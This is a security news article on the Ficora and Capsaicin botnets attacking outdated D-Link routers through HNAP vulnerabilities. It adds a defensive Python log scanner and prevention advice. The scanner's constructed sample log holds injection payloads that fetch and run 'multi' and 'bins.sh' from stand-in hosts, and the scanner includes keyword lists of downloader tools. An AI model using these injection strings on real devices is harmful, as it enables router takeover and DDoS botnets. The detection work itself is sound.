Massive Botnet Campaign Targets Millions of Vulnerable D-Link Routers

D-Link Routers Under Attack by Ficora and Capsaicin Botnets

Two emerging botnets, Ficora and Capsaicin, are actively targeting vulnerable D-Link routers, particularly models running outdated firmware or that have reached end-of-life (EOL) status and no longer receive security updates. Popular models under attack include the DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.

Attack Methodology
The malware exploits known, long-patched vulnerabilities (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112) to compromise devices through D-Link’s HNAP (Home Network Administration Protocol) management interface. None of these flaws is new; the oldest dates from 2015, so the campaign succeeds only against routers that were never updated or that can no longer be updated. Both botnets primarily focus on launching DDoS attacks.

Ficora Botnet
– A Mirai variant specifically targeting D-Link devices
– Shows widespread distribution, particularly in Japan and the United States
– Delivered by a downloader shell script named ‘multi’, which fetches and runs the bot payload
– Ships payloads for multiple hardware architectures, so one script can infect different router CPUs
– Spreads further by brute-forcing logins with a hard-coded list of credentials
– Implements UDP flooding, TCP flooding, and DNS amplification attacks

Capsaicin Botnet
– A Kaiten variant developed by the Keksec group
– Primarily targets East Asian countries
– Delivered by a downloader script named “bins.sh” that fetches bot binaries whose names carry the ‘yakuza’ prefix
– Kills competing botnet malware already running on the infected device so it has the router to itself
– Capable of information gathering and DDoS attacks
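The HNAP attack vector and the downloader artifacts named above (the ‘multi’ script, “bins.sh”, the ‘yakuza’ prefix) translate directly into detection logic. The following is an added example written for this article; it is not code from the article, from D-Link, or from the vendor reports it summarizes. It assumes a reverse proxy or WAF in front of the router that logs the HTTP SOAPAction header and request body (a stock access log records neither), and the log format, indicator strings and every sample line are constructed for illustration. The `http://purenetworks.com/HNAP1/` namespace is the standard HNAP SOAPAction prefix; the addresses come from the RFC 5737 documentation ranges.

```python
"""Flag suspicious HNAP traffic in a constructed request log.

Added example for this article, not code from the article or from the
botnet reports it summarises. Assumed: a proxy/WAF logs the SOAPAction
header and body. Log format and all sample lines are constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

HNAP_PATH = "/HNAP1/"

# Shell metacharacters that never belong in a SOAPAction header or HNAP body.
SHELL_META = re.compile(r"[`;|&]|\$\(")

# Tools a first-stage payload typically uses to pull the next stage.
DOWNLOADERS = ("wget", "curl", "tftp")

# Downloader artefacts the article associates with the two botnets:
# 'multi' (Ficora), 'bins.sh' and 'yakuza'-prefixed binaries (Capsaicin).
DOWNLOADER_IOCS = ("/multi", "bins.sh", "yakuza")

# Constructed format: <ip> "<METHOD> <path>" <status> soapaction="..." body="..."
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'soapaction="(?P<soapaction>[^"]*)" body="(?P<body>[^"]*)"$'
)


@dataclass
class Finding:
    src_ip: str
    reasons: List[str]
    line: str


def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding for an HNAP request that looks like an exploit attempt."""
    m = LOG_RE.match(line)
    if not m or not m["path"].startswith(HNAP_PATH):
        return None
    reasons = []
    soapaction, body = m["soapaction"], m["body"]
    # Injection via the header: a legitimate SOAPAction is a bare URI.
    if SHELL_META.search(soapaction):
        reasons.append("shell metacharacters in SOAPAction header")
    # Injection via the body: a command separator followed by a fetch tool.
    if SHELL_META.search(body) and any(t in body for t in DOWNLOADERS):
        reasons.append("command separator plus downloader in HNAP body")
    # Known stage-two artefacts anywhere in the request.
    blob = (soapaction + " " + body).lower()
    for ioc in DOWNLOADER_IOCS:
        if ioc in blob:
            reasons.append(f"known downloader artefact {ioc!r}")
    return Finding(m["ip"], reasons, line) if reasons else None


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in map(inspect_line, lines) if f is not None]


def bruteforce_sources(lines: List[str], threshold: int = 5) -> List[str]:
    """Source IPs with at least `threshold` rejected HNAP logins (HTTP 401)."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["path"].startswith(HNAP_PATH) and m["status"] == "401":
            hits[m["ip"]] += 1
    return sorted(ip for ip, n in hits.items() if n >= threshold)


# Constructed sample log: one benign HNAP call, one non-HNAP page, two
# injection attempts, and a burst of failed logins from a single source.
SAMPLE_LOG = [
    '192.0.2.10 "POST /HNAP1/" 200 soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings" body="<GetDeviceSettings/>"',
    '192.0.2.11 "GET /index.htm" 200 soapaction="" body=""',
    '198.51.100.7 "POST /HNAP1/" 500 soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`wget http://203.0.113.5/multi`" body=""',
    '198.51.100.8 "POST /HNAP1/" 200 soapaction="http://purenetworks.com/HNAP1/SetDeviceSettings" body="<x/>; cd /tmp; wget http://203.0.113.9/bins.sh; sh bins.sh"',
] + [
    '198.51.100.9 "POST /HNAP1/" 401 soapaction="http://purenetworks.com/HNAP1/Login" body="<Login/>"'
] * 6

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.src_ip, "->", "; ".join(f.reasons))
    print("brute-force candidates:", bruteforce_sources(SAMPLE_LOG))
```

Two design points. The header check is deliberately broad: a well-formed SOAPAction is a bare URI, so any shell metacharacter in it is worth an alert regardless of which CVE the attacker is aiming for, and the check keeps working when the payload hostnames and script names change. The body check is narrower (separator plus fetch tool) because request bodies legitimately contain XML with characters that look busy; the named-artefact list then catches the specific campaign even when the injection is encoded in a way the first two checks miss.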

Prevention Measures
– Keep router firmware updated; every CVE in this campaign has a vendor fix for supported models
– Replace end-of-life devices, which will never receive a patch for these or future flaws
– Use strong, unique administrator passwords, since both botnets also spread by brute-forcing weak credentials
– Disable remote (WAN-side) management, including the HNAP interface, unless it is genuinely needed